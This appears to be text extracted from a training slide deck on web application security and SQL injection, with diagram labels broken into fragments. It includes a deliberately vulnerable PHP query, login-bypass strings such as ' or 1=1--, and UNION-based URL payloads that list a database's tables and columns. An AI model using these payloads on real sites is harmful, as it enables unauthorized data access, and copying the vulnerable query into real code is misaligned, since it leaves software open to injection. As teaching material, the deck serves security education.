Web Application Security

By

Noah Franklin J

Session Flow

Copy Rights to Noah Franklin J

• What is Web Application Security?

• Security Misconceptions

• Reasons for Attacking Web Applications

• OWASP Top 10 Vulnerabilities

• Security guidelines

• Web Application Security checklist

Web Application Setup

Copy Rights to Noah Franklin J

Web Application Setup

Copy Rights to Noah Franklin J

Fire

wal

l

Hardened OS

Web Server

App ServerFi

rew

all

Dat

abas

es

Lega

cy S

yste

ms

We

b S

erv

ice

s

Dir

ect

ori

es

Hu

man

Re

srcs

Bill

ing

Custom Code

APPLICATIONATTACK

Net

wo

rk L

ayer

Ap

plic

atio

n L

ayer

Acc

ou

nts

Fin

ance

Ad

min

istr

atio

n

Tran

sact

ion

s

Co

mm

un

icat

ion

Kn

ow

led

ge M

gmt

E-C

om

me

rce

Bu

s. F

un

ctio

ns

Insider

Application Layer

• Attacker sends attacks inside valid HTTP requests

• Your custom code is tricked into doing something it should not

• Security requires software development expertise, not signatures

•Network Layer

• Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.

• Security relies on signature databases

Reasons for Attacking Web Apps

Copy Rights to Noah Franklin J

Web Application threads

Copy Rights to Noah Franklin J

Web Application Threads

Copy Rights to Noah Franklin J

Web Application Working

Copy Rights to Noah Franklin J

3

Attacker sends data containing SQL fragments

Attacker enters SQL fragments into a web page that uses input in a query

1

Attacker views unauthorized data

Custom Code

Acc

ou

nts

Fin

ance

Ad

min

istr

atio

n

Tran

sact

ion

s

Co

mm

un

icat

ion

Kn

ow

led

ge M

gmt

E-C

om

me

rce

Bu

s. F

un

ctio

ns

Database

2 Application sends modified query to database, which executes it

EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id’] . "’";

Fire

wal

l

Hardened OS

Web Server

App ServerFi

rew

all

Dat

abas

es

Lega

cy S

yste

ms

Web

Ser

vice

s

Dir

ecto

ries

Hu

man

Res

rcs

Bill

ing

Custom Code

APPLICATIONATTACK

Net

wo

rk L

ayer

Ap

plic

atio

n L

ayer

Acc

ou

nts

Fin

ance

Ad

min

istr

atio

n

Tran

sact

ion

s

Co

mm

un

icat

ion

Kn

ow

led

ge M

gmt

E-C

om

mer

ce

Bu

s. F

un

ctio

ns

HTTP

request

SQL

query

DB

Table

HTTP

response

“SELECT * FROM

accounts WHERE

acct=„‟ OR 1=1--

‟”

Account Summary

Acct:5424-6066-2134-

4334

Account:

SKU:

Account:

SKU:

1. Application presents a form to the attacker all via SSL

2. Attacker sends an attack in the form data

3. Application forwards attackto the database in a SQL query

4.Database runs querycontaining attack and sendsencrypted results back toapplication

5. Application decrypts data as normal and sends results to the user

Injection Flaw

Copy Rights to Noah Franklin J

What is SQL Injection?

Copy Rights to Noah Franklin J

Insertion of SQL statements into application inputs to corrupt, exploit, or otherwise damage an application database.

Most commonly done directly through web forms, but can be directed through URL hacking, request hacking using debugging tools, or using bots that emulate browsers and manipulate web requests.

What is a SQL Injection Attack?

Copy Rights to Noah Franklin J

Many web applications take user input from a form

A SQL injection attack involves placing SQL statements in the user input

SQL Basics

Copy Rights to Noah Franklin J

• Standard SQL commands such as

• "Select“ , "Insert“, "Update“, "Delete“, "Create",and "Drop" can be used to accomplish almosteverything that one needs to do with a database.

Types of SQL injection

Copy Rights to Noah Franklin J

• Direct injection Example – ‘ or 1=1– and true

conditions

• Indirect injection

Integer based

String based

Error based

Blind

Xml injection

Double string

Program Behind Login Page

Copy Rights to Noah Franklin J

if(username==franky) && (password==12345)

printf("Welcome to Email ");

else

{

printf("Invalid Username or password");

}

Program Behind Login Page

Copy Rights to Noah Franklin J

if(username== a‘ or 1=1--) && (password==a‘or 1=1-

-)

printf("Welcome to Email ");

else

{

printf("Invalid Username or password");

}

SQL Injection

Copy Rights to Noah Franklin J

SQL Basic Demo

SQL Injection Extracting Database

Copy Rights to Noah Franklin J

Example : www.site.com/index.php?id=1

Add ‘ or /* after id= 1 to check whether site is

vulnerable or not.

if site is giving some error/blank page then site is

vulnerable to SQL injection.

Copy Rights to Noah Franklin J

www.site.com/index.php?id=1+union+all+select+1,table_name,3,

,5,6,7+from+information_schema.tables

The above mentioned query gives names of tables stored in

database.

www.site.com/index.php?id=1+union+all+select+1,column_name

3,4,5,6,7+from+information_schema.columns+where+table_sche

a=char()

The above mentioned query gives names of tables stored in

database.

SQL Injection Extracting Database

Copy Rights to Noah Franklin J

www.site.com/index.php?id=1+union+all+select+1,table_name,3,

,5,6,7+from+information_schema.tables

The above mentioned query gives names of tables stored in

database.

www.site.com/index.php?id=1+union+all+select+1,column_name

3,4,5,6,7+from+information_schema.columns

The above mentioned query gives names of columns stored in

database.

SQL Injection Extracting Database

SQL Injection

Copy Rights to Noah Franklin J

SQL Demo

Countermeasure

Copy Rights to Noah Franklin J

• Check the input provided to database queries

• Validate and sanitize every user variable passed to

database